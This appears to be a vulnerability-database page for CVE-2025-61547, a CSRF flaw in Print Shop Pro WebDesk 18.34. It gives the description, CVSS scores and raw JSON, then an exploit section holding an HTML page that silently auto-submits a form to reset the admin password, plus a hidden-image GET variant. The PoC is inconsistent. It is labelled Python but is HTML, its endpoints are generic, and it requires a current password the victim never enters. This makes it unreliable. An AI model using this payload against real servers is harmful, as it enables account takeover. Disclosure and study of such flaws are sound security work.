Security Vulnerability Report
中文
CVE-2025-61547 CVSS 6.8 MEDIUM

CVE-2025-61547

Published: 2026-01-08 17:15:49
Last Modified: 2026-02-10 18:16:20
Source: [email protected]

Description

Cross-Site Request Forgery (CSRF) is present on all functions in edu Business Solutions Print Shop Pro WebDesk version 18.34 (fixed in 19.76). The application does not implement proper CSRF tokens or other other protective measures, allowing a remote attacker to trick authenticated users into unknowingly executing unintended actions within their session. This can lead to unauthorized data modification such as credential updates.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:edubusinesssolutions:print_shop_pro_webdesk:18.34:*:*:*:*:*:*:* - VULNERABLE
Print Shop Pro WebDesk < 19.76
Print Shop Pro WebDesk 18.34 (受影响的已知版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-61547 --> <!-- Print Shop Pro WebDesk Credential Modification --> <html> <body> <h1>CVE-2025-61547 CSRF PoC</h1> <p>Print Shop Pro WebDesk v18.34 - Credential Update</p> <form action="https://target-server/WebDesk/api/user/updateCredentials" method="POST" id="csrfForm"> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="newPassword" value="HackedPassword123" /> <input type="hidden" name="confirmPassword" value="HackedPassword123" /> <input type="hidden" name="currentPassword" value="[attacker-needs-victim-to-enter]" /> </form> <script> // Auto-submit the form when page loads document.addEventListener('DOMContentLoaded', function() { document.getElementById('csrfForm').submit(); }); </script> <p>If you see this text, the CSRF attack failed.</p> </body> </html> <!-- Alternative: Image-based GET request PoC --> <!-- <img src="https://target-server/WebDesk/api/settings/modify?param=value" width="0" height="0" border="0"> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61547", "sourceIdentifier": "[email protected]", "published": "2026-01-08T17:15:48.620", "lastModified": "2026-02-10T18:16:19.923", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) is present on all functions in edu Business Solutions Print Shop Pro WebDesk version 18.34 (fixed in 19.76). The application does not implement proper CSRF tokens or other other protective measures, allowing a remote attacker to trick authenticated users into unknowingly executing unintended actions within their session. This can lead to unauthorized data modification such as credential updates."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:edubusinesssolutions:print_shop_pro_webdesk:18.34:*:*:*:*:*:*:*", "matchCriteriaId": "88C72179-FF05-44F1-87A2-80179F38245D"}]}]}], "references": [{"url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2025-61547", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.